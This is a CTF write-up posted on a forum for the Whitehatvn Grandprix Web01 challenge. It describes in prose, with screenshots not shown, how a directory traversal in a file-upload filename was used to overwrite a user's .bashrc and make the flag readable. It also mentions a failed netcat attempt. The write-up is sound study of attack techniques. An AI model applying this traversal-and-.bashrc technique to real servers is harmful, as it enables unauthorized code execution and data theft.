Whitehatvn Grandprix CTF - Web01 writeup

This weekend we participated in Whitehatvn Grandprix CTF and this is one of the 2 real challenges we managed to solve.
Big thanks to @anon3236228 for executing exploit while challenge was officially down,
getting us flag quicker (and for being help in brainstorming).

Description:
manhndd is running a service file upload at
web01.grandprix.whitehatvn.com,
it is restored every 2 minutes. Every 1 minute after service starts, he ssh into server to check /var/secret. Can you get it?

Writeup:

After visiting provided website we are presented with upload page running SimpleHttpServerWithUpload.py, it didn’t ask for any particular file type and didn’t check extension.
I saw other players trying to upload various shells without success so I decided to inspect upload functionality closer.

I used Burp Repeater which is nice tool for easily and quickly changing your requests and getting results back.
After uploading test file we are presented with following message:

burp-web01-2

So we know our files are saved in /opt directory, I tried to go one directory up by modifying filename parameter to “/…/test”
which resulted in “Couldn’t save file , are you sure you have right permissions?” which means that upload is vulnerable to directory traversal! But we can’t write anywhere, first thing I tried was writing to /tmp:

burp-web01-3

Great, but not very useful , we can’t even read file we uploaded :frowning: . I unsuccesfully tried to write a cron file, and even had crazy
ideas about exploiting service by writing to something in /proc/self/ but it resulted in nothing. Then I reread description again:

**manhndd** is running a service file upload at...Every 1 minute after service starts, **he ssh into server**...

Of course! It should be possible to write to home directory of this user and overwrite his .bashrc file which is executed every time he logs in.
Test file first:

burp-web01-4

Awesome, write was successful but how to get a flag out? After few attempts of using netcat we realized outbound connections were blocked
so we decided to write to /opt which we seemed to have access to:

finalscreenshot-web01

And it worked! Flag could be found at web01.grandprix.whitehatvn.com/shellPyhscript :smiley:

8 Likes

Nice writeup… kudos to you. Nice well use of already pre-existing tools. :slight_smile:

1 Like

This topic was automatically closed after 30 days. New replies are no longer allowed.